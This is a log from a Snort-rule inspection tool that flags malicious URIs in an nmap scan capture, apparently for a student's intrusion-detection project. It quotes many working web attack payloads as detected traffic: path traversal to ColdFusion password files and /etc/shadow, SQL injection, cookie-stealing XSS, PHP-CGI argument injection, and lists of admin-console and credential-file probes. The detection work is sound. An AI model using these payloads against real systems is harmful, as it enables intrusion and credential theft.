# inspectorlog v3.5
#----- Initializing Rules (SNORT) ---------------------
# Rules directory : "/home/kali/Downloads/reglas_javi/snort"
#	Opening SNORT rule file /home/kali/Downloads/reglas_javi/snort/http_uri-sn-20220324.rules... done
#		Rules: read [3749], erroneous [0], URI [384]
#	Opening SNORT rule file /home/kali/Downloads/reglas_javi/snort/http_uri-er-20220224.rules... done
[parse_snortRule] WARNING: Line [4970] exceeds allowed number of PCRE fields
#		Rules: read [6015], erroneous [0], URI [5116]
#----- Statistics (SNORT) ------------------------------
# Read [9764] Snort rules, [5500] http-related, [0] with errors
#----- Analysis results ----------------------------
# Alerts & signatures generated from: /home/kali/Downloads/inspectorlog/inspectorlog -l nmap.short -r /home/kali/Downloads/reglas_javi/snort -t list -o /home/kali/TFG/ficheros_uris_completos/web_dinamica//snort/nmap_short.clean
Packet [13]	Uri [/%3f*~1*/*.aspx?aspxerrorpath=/]	Nattacks [1]	Signatures	[2015023]
Packet [14]	Uri [/%3f*~10*/*.aspx?aspxerrorpath=/]	Nattacks [1]	Signatures	[2015023]
Packet [15]	Uri [/%3f*~11*/*.aspx?aspxerrorpath=/]	Nattacks [1]	Signatures	[2015023]
Packet [67]	Uri [/?-d+allow_url_include%3d1+-d+auto_prepend_file%3dphp://input]	Nattacks [3]	Signatures	[2014704]	[2016977]	[2016982]
Packet [68]	Uri [/?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000]	Nattacks [1]	Signatures	[2011141]
Packet [69]	Uri [/?=PHPE9568F36-D428-11d2-A769-00AA001ACF42]	Nattacks [1]	Signatures	[2011144]
Packet [70]	Uri [/?p4yl04d2=1%20UNION%20ALL%20SELECT%201,2,3,table_name%20FROM%20information_schema.tables,/?p4yl04d3=<script>alert(document.cookie)</script>]	Nattacks [4]	Signatures	[2006445]	[2006446]	[2009714]	[2017808]
Packet [73]	Uri [/?parameter=%3Cscript%3Ealert%281%29%3C%2Fscript%3E]	Nattacks [1]	Signatures	[2009714]
Packet [76]	Uri [/?parameter=<script>alert(1)</script>]	Nattacks [1]	Signatures	[2009714]
Packet [128]	Uri [/admin-console/]	Nattacks [1]	Signatures	[21517]
Packet [515]	Uri [/axis2/,/happyaxis.jsp,/web-console/ServerInfo.jsp,/web-console/Invoker,/invoker/JMXInvokerServlet,/invoker/,/jmx-console/,/admin-console/,/CFIDE/administrator/enter.cfm,/CFIDE/administrator/entman/index.cfm,/cfide/install.cfm,/CFIDE/administrator/archives/index.cfm,/CFIDE/wizards/common/_logintowizard.cfm,/CFIDE/componentutils/login.cfm,/CFIDE/Administrator/startstop.html,/common/help/en/go/login_ts.html,/system/login/,/system/login/reset?next=%2Fsystem%2Flogin&set-lang=en,/common/images/logos/img_logoMain.jpg,/Dashboard/Dashboard.html]	Nattacks [8]	Signatures	[21516]	[21517]	[24342]	[24343]	[25975]	[25977]	[2016182]	[2016184]
Packet [656]	Uri [/CFIDE/adminapi/administrator.cfc?method=login&adminpassword=&rdsPasswordAllowed=true]	Nattacks [2]	Signatures	[25976]	[2016183]
Packet [657]	Uri [/CFIDE/adminapi/customtags/l10n.cfm?attributes.id=it&attributes.file=../../administrator/analyzer/index.cfm&attributes.locale=it&attributes.var=it&attributes.jscript=false&attributes.type=text/html&attributes.charset=UTF-8&thisTag.executionmode=end&thisTag.generatedContent=htp]	Nattacks [3]	Signatures	[25976]	[2016183]	[2016841]
Packet [658]	Uri [/CFIDE/adminapi/customtags/l10n.cfm?attributes.id=it&attributes.file=../../administrator/mail/download.cfm&filename=../../../../../../../../../opt/coldfusion/cfusion/lib/password.properties&attributes.locale=it&attributes.var=it&attributes.jscript=false&attributes.type=text/html&attributes.charset=UTF-8&thisTag.executionmode=end&thisTag.generatedContent=htp]	Nattacks [3]	Signatures	[25976]	[2016183]	[2016836]
Packet [659]	Uri [/CFIDE/adminapi/customtags/l10n.cfm?attributes.id=it&attributes.file=../../administrator/mail/download.cfm&filename=../../../../../../../../../opt/coldfusion10/cfusion/lib/password.properties&attributes.locale=it&attributes.var=it&attributes.jscript=false&attributes.type=text/html&attributes.charset=UTF-8&thisTag.executionmode=end&thisTag.generatedContent=htp]	Nattacks [3]	Signatures	[25976]	[2016183]	[2016836]
Packet [660]	Uri [/CFIDE/adminapi/customtags/l10n.cfm?attributes.id=it&attributes.file=../../administrator/mail/download.cfm&filename=../../../../../../../../../opt/coldfusion9/cfusion/lib/password.properties&attributes.locale=it&attributes.var=it&attributes.jscript=false&attributes.type=text/html&attributes.charset=UTF-8&thisTag.executionmode=end&thisTag.generatedContent=htp]	Nattacks [3]	Signatures	[25976]	[2016183]	[2016836]
Packet [661]	Uri [/CFIDE/adminapi/customtags/l10n.cfm?attributes.id=it&attributes.file=../../administrator/mail/download.cfm&filename=../../lib/password.properties&attributes.locale=it&attributes.var=it&attributes.jscript=false&attributes.type=text/html&attributes.charset=UTF-8&thisTag.executionmode=end&thisTag.generatedContent=htp]	Nattacks [3]	Signatures	[25976]	[2016183]	[2016836]
Packet [662]	Uri [/CFIDE/adminapi/customtags/l10n.cfm?attributes.id=it&attributes.file=../../administrator/mail/download.cfm&filename=..\..\..\..\..\..\..\..\..\..\..\JRun4\servers\cfusion\cfusion-ear\cfusion-war\WEB-INF\cfusion\lib\password.properties&attributes.locale=it&attributes.var=it&attributes.jscript=false&attributes.type=text/html&attributes.charset=UTF-8&thisTag.executionmode=end&thisTag.generatedContent=htp]	Nattacks [3]	Signatures	[25976]	[2016183]	[2016836]
Packet [663]	Uri [/CFIDE/adminapi/customtags/l10n.cfm?attributes.id=it&attributes.file=../../administrator/mail/download.cfm&filename=..\..\..\..\..\..\..\..\..\ColdFusion10\cfusion\lib\password.properties&attributes.locale=it&attributes.var=it&attributes.jscript=false&attributes.type=text/html&attributes.charset=UTF-8&thisTag.executionmode=end&thisTag.generatedContent=htp]	Nattacks [3]	Signatures	[25976]	[2016183]	[2016836]
Packet [664]	Uri [/CFIDE/adminapi/customtags/l10n.cfm?attributes.id=it&attributes.file=../../administrator/mail/download.cfm&filename=..\..\..\..\..\..\..\..\..\ColdFusion10\lib\password.properties&attributes.locale=it&attributes.var=it&attributes.jscript=false&attributes.type=text/html&attributes.charset=UTF-8&thisTag.executionmode=end&thisTag.generatedContent=htp]	Nattacks [3]	Signatures	[25976]	[2016183]	[2016836]
Packet [665]	Uri [/CFIDE/adminapi/customtags/l10n.cfm?attributes.id=it&attributes.file=../../administrator/mail/download.cfm&filename=..\..\..\..\..\..\..\..\..\ColdFusion9\cfusion\lib\password.properties&attributes.locale=it&attributes.var=it&attributes.jscript=false&attributes.type=text/html&attributes.charset=UTF-8&thisTag.executionmode=end&thisTag.generatedContent=htp]	Nattacks [3]	Signatures	[25976]	[2016183]	[2016836]
Packet [666]	Uri [/CFIDE/adminapi/customtags/l10n.cfm?attributes.id=it&attributes.file=../../administrator/mail/download.cfm&filename=..\..\..\..\..\..\..\..\..\ColdFusion9\lib\password.properties&attributes.locale=it&attributes.var=it&attributes.jscript=false&attributes.type=text/html&attributes.charset=UTF-8&thisTag.executionmode=end&thisTag.generatedContent=htp]	Nattacks [3]	Signatures	[25976]	[2016183]	[2016836]
Packet [667]	Uri [/CFIDE/adminapi/customtags/l10n.cfm?attributes.id=it&attributes.file=../../administrator/mail/download.cfm&filename=..\..\lib\password.properties&attributes.locale=it&attributes.var=it&attributes.jscript=false&attributes.type=text/html&attributes.charset=UTF-8&thisTag.executionmode=end&thisTag.generatedContent=htp]	Nattacks [3]	Signatures	[25976]	[2016183]	[2016836]
Packet [668]	Uri [/CFIDE/administrator/archives/index.cfm]	Nattacks [2]	Signatures	[25975]	[2016184]
Packet [669]	Uri [/CFIDE/administrator/enter.cfm]	Nattacks [2]	Signatures	[25975]	[2016184]
Packet [670]	Uri [/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\..\..\..\..\JRun4\servers\cfusion\cfusion-ear\cfusion-war\WEB-INF\cfusion\lib\password.properties%00en]	Nattacks [3]	Signatures	[25975]	[2016184]	[2016836]
Packet [671]	Uri [/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\..\..\CFusionMX7\lib\password.properties%00en]	Nattacks [3]	Signatures	[25975]	[2016184]	[2016836]
Packet [672]	Uri [/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\..\..\CFusionMX\lib\password.properties%00en]	Nattacks [3]	Signatures	[25975]	[2016184]	[2016836]
Packet [673]	Uri [/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\..\..\ColdFusion8\lib\password.properties%00en]	Nattacks [3]	Signatures	[25975]	[2016184]	[2016836]
Packet [674]	Uri [/CFIDE/administrator/entman/index.cfm]	Nattacks [2]	Signatures	[25975]	[2016184]
Packet [675]	Uri [/CFIDE/administrator/images/loginbackground.jpg]	Nattacks [2]	Signatures	[25975]	[2016184]
Packet [676]	Uri [/CFIDE/Administrator/startstop.html]	Nattacks [1]	Signatures	[2016184]
Packet [677]	Uri [/CFIDE/componentutils/login.cfm]	Nattacks [2]	Signatures	[25977]	[2016182]
Packet [686]	Uri [/cgi-bin/config.exp]	Nattacks [1]	Signatures	[2033089]
Packet [1098]	Uri [/help/../../etc/shadow]	Nattacks [1]	Signatures	[2009485]
Packet [1208]	Uri [/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(1,concat(1,user()),1)]	Nattacks [1]	Signatures	[2024342]
Packet [1213]	Uri [/Info.live.htm]	Nattacks [1]	Signatures	[2012116]
Packet [1234]	Uri [/invoker/JMXInvokerServlet]	Nattacks [1]	Signatures	[24343]
Packet [1256]	Uri [/jmx-console/]	Nattacks [1]	Signatures	[21516]
Packet [1296]	Uri [/level/15/exec/-/configure/http]	Nattacks [1]	Signatures	[2010623]
Packet [1399]	Uri [/manager/html/upload]	Nattacks [1]	Signatures	[2009220]
Packet [1650]	Uri [/phpinfo.php]	Nattacks [1]	Signatures	[2019526]
Packet [1744]	Uri [/plugins/PluginController.php?path=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini%00]	Nattacks [1]	Signatures	[2012750]
Packet [1745]	Uri [/plugins/PluginController.php?path=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini%00,/tiki-listmovies.php?movie=../../../../../../etc/passwd%001234,/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20,/d41d8cd98f00b204e9800998ecf8427e.php,/bsc_lan.php?NO_NEED_AUTH=1&AUTH_GROUP=0,/rom-0,/Telerik.Web.UI.DialogHandler.aspx?dp=////,/Telerik.Web.UI.DialogHandler.ashx?dp=////,/DesktopModules/Admin/RadEditorProvider/DialogHandler.aspx?dp=////,/uir//etc/passwd,/uir//tmp/csman/0,/cgi-bin/export_debug_msg.exp,/cgi-bin/config.exp,/,/readme.html,/,?feed=rss,?feed=rss2,?feed=atom,/feed,/feed/,/feed/rss,/feed/rss2,/feed/atom]	Nattacks [1]	Signatures	[2012750]
Packet [1841]	Uri [/rom-0]	Nattacks [1]	Signatures	[2018232]
Packet [2135]	Uri [/trace/,/heapdump/,/jolokia/,/vmware/,/vmware/imx/vmware_boxes-16x16.png,/ui/,/ui/imx/vmwareLogo-16x16.png,/ui/imx/vmwarePaperBagLogo-16x16.png,/ui/vManage.do,/client/VMware-viclient.exe,/en/welcomeRes.js,/citrix/,/Citrix/,/Citrix/MetaFrame/auth/login.aspx,/images/ctxHeader01.jpg,/images/Safeword_Token.jpg,/sw/auth/login.aspx,/vpn/images/AccessGateway.ico,/citrix/AccessPlatform/auth/clientscripts/,/AccessPlatform/auth/clientscripts/,/Citrix//AccessPlatform/auth/clientscripts/cookies.js,/Citrix/AccessPlatform/auth/clientscripts/login.js,/Citrix/PNAgent/config.xml,/cgi-bin/image/shikaku2.png,/config/public/usergrp.gif,/pictures/buttons/file_view_mark.gif,/cpqlogin.htm?RedirectUrl=/&RedirectQueryString=,/hplogo.gif,/ie_index.htm,/ilo.gif,/images/icon_server_connected.gif,/mxhtml/images/signin_logo.gif,/mxhtml/images/status_critical_15.gif,/mxportal/home/en_US/servicetools.gif,/mxportal/home/MxPortalFrames.jsp,/xymon/menu/menu.css,/rrc.htm,/manager/html/upload,/manager/html,/axis2/axis2-web/HappyAxis.jsp]	Nattacks [1]	Signatures	[2009220]
Packet [2176]	Uri [/upload_multiple_js.php,/uploadtester.asp,/info.php,/phpinfo.php,/kusabax/manage_page.php,/plus/lurking.php,/adm/barra/assetmanager/assetmanager.php,/eyeos/,/NETWARE.HTM,/setup.cgi,/debug.cgi,/ehcp/?op=applyforftpaccount,/ehcp/?op=applyforaccount,/ehcp/?op=applyfordomainaccount,/vhosts/ehcp/?op=applyforftpaccount,/vhosts/ehcp/?op=applyforaccount,/vhosts/ehcp/?op=applyfordomainaccount,/tools_admin.cgi?,/level/15,/exec/show/log/CR,/level/15/exec/-/configure/http,/level/15/exec/-,/appServer/jvmReport.jsf?instanceName=server&pageTitle=JVM%20Report,/common/appServer/jvmReport.jsf?pageTitle=JVM%20Report,/common/appServer/jvmReport.jsf?reportType=summary&instanceName=server,/console/login/loginForm.jsp,/login_img.jpg,/cirronetlogo.gif,/browserId/wizardForm.jhtml,/webline/html/forms/callback.jhtml,/webline/html/forms/callbackICM.jhtml,/webline/html/agent/AgentFrame.jhtml,/webline/html/agent/default/badlogin.jhtml,/callme/callForm.jhtml,/webline/html/multichatui/nowDefunctWindow.jhtml,/browserId/wizard.jhtml,/admin/CiscoAdmin.jhtml,/msccallme/mscCallForm.jhtml,/webline/html/admin/wcs/LoginPage.jhtml]	Nattacks [2]	Signatures	[2010623]	[2019526]
Packet [2225]	Uri [/web-console/Invoker]	Nattacks [1]	Signatures	[24342]
Packet [2226]	Uri [/web-console/ServerInfo.jsp]	Nattacks [1]	Signatures	[24342]
Packet [2330]	Uri [/wp-config.php~]	Nattacks [1]	Signatures	[2009955]
Packet [2530]	Uri [/_vti_pvt/access.cnf,/_vti_pvt/administrator.pwd,/_vti_pvt/administrators.pwd,/_vti_pvt/authors.pwd,/_vti_pvt/bots.cnf,/_vti_pvt/botinfs.cnf,/_vti_pvt/deptodoc.btr,/_vti_pvt/doctodep.btr,/_vti_pvt/frontpg.lck,/_vti_pvt/linkinfo.cnf,/_vti_pvt/service.cnf,/_vti_pvt/service.grp,/_vti_pvt/service.lck,/_vti_pvt/service.pwd,/_vti_pvt/Service.stp,/_vti_pvt/services.cnf,/_vti_pvt/services.org,/_vti_pvt/structure.cnf,/_vti_pvt/svcacl.cnf,/_vti_pvt/users.pwd,/_vti_pvt/uniqueperm.cnf,/_vti_pvt/writeto.cnf,/.svn/,/.svn/text-base/.htaccess.svn-base,/.svn/text-base/.htpasswd.svn-base,/.svn/text-base/Web.config.svn-base,/.git/HEAD,/.hg/requires,/.bzr/README,/downloadFile.php,/BackupConfig.php,/cwhp/auditLog.do?file=..\..\..\..\..\..\..\boot.ini,/cwhp/auditLog.do?file=..\..\..\..\..\..\..\Program%20Files\CSCOpx\MDC\Tomcat\webapps\triveni\WEB-INF\classes\schedule.properties,/cwhp/auditLog.do?file=..\..\..\..\..\..\..\Program%20Files\CSCOpx\lib\classpath\com\cisco\nm\cmf\dbservice2\DBServer.properties,/cwhp/auditLog.do?file=..\..\..\..\..\..\..\Program%20Files\CSCOpx\log\dbpwdChange.log,..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f/var/mobile/Library/AddressBook/AddressBook.sqlitedb,/Info.live.htm,/CuteSoft_Client/CuteEditor/Load.ashx?type=image&file=../../../web.config]	Nattacks [1]	Signatures	[2012116]
Packet [2555]	Uri [/~1*/*.aspx?aspxerrorpath=/]	Nattacks [1]	Signatures	[2015023]
Packet [2556]	Uri [/~1/*.aspx?aspxerrorpath=/]	Nattacks [1]	Signatures	[2015023]
# N. packets [2587], [53] with alerts, N. Alerts [102]
# Execution time: 0.518409 s
